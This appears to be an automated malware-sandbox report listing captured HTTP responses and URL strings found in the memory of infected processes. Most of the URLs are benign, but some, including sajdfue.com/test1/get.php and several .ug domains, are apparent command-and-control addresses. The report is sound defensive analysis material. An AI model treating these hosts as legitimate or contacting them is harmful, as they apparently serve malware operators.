trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 35 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 83 54 0e 7d 17 be a1 83 bd ad 1d a1 52 dd 6d ba 19 59 9d 09 f4 a6 2d af 7b 64 0f a5 b4 89 18 c9 2d 84 1b 8f be 42 c3 5c 9a d3 f7 27 69 98 d0 4b 6b 80 a7 b4 0e 89 d3 cf 37 b2 33 ce 98 77 4d 1a 7d 4b 47 98 fc 64 a0 f2 5c 90 0d 0a 30 0d 0a 0d 0a Data Ascii: 5eI:82OT}RmY-{d-B\'iKk73wM}KGd\0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Tue, 16 Apr 2024 23:37:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 51 de 4b d1 fb 25 83 2a e8 ae 95 58 2d e4 be 41 2d fa a5 b4 6a f3 91 be 5a a8 74 9e c9 37 40 5a 3c 0d 4f df a6 3d fd dd 47 87 ad d3 1a d1 3b 93 84 69 77 3c f0 29 76 94 c8 9e 94 25 ff 60 18 88 4a ef 0a ea e3 d2 63 d1 82 f6 31 db 7f f3 ae 9a e0 5c 8c c0 97 18 1f c4 5f fe bc bf c1 fa ad 12 15 a9 2e 8b de 22 82 7f 65 46 b7 8d ab e6 a9 41 b9 1d 34 99 97 be ea 8b e6 78 82 74 34 36 6a 3a eb 87 09 c7 29 aa af ae 2e c0 d5 85 04 4e 30 63 cc 0d 0a 30 0d 0a 0d 0a Data Ascii: c5I:82OB%,YR("XQK%*X-A-jZt7@Z<O=G;iw<)v%`Jc1\_."eFA4xt46j:).N0c0
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000001.00000000.1702723617.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704418772.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000021.00000003.2372744316.00000000096C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2360803905.00000000096C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2351115035.00000000096C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2330240672.00000000096C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2374311632.00000000096C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 00000022.00000002.2450746344.000001BCF4200000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000001.00000000.1702723617.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704418772.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: explorer.exe, 00000001.00000000.1702723617.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704418772.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4418000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF444D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 00000022.00000003.2298344648.000001BCF4507000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: A5B6.exe, 00000009.00000002.2028759696.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000000A.00000002.2049909948.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000000E.00000002.2068427651.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000000F.00000002.2078107088.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000010.00000002.2076702437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2898265462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 00000017.00000002.2181665321.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 00000018.00000002.2190525495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A5B6.exe, 0000001C.00000002.2266063708.0000000004990000.00000040.00001000.00020000.00000000.sdmp, A5B6.exe, 0000001D.00000002.2276060736.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000001.00000000.1702723617.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1704418772.000000000982D000.00000004.00000001.00020000.00000000.sdmp, D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000339B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2364194118.000000000339F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000001.00000000.1702723617.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: D3CC.exe, 00000015.00000003.2211627146.0000000003E9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: RegAsm.exe, 00000014.00000002.2356258520.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://purl.oen
Source: RegAsm.exe, 00000014.00000002.2364194118.000000000337F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rachmatmusa.com
Source: A5B6.exe, 00000011.00000002.2900242612.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A5B6.exe, 00000011.00000002.2900242612.00000000008B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/test1/get.php
Source: A5B6.exe, 00000011.00000002.2900242612.00000000008B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://sajdfue.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: explorer.exe, 00000001.00000000.1704418772.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1704418772.000000000982D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1705120219.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1703542811.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1703988290.0000000008720000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegAsm.exe, 00000014.00000002.2364194118.0000000003045000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
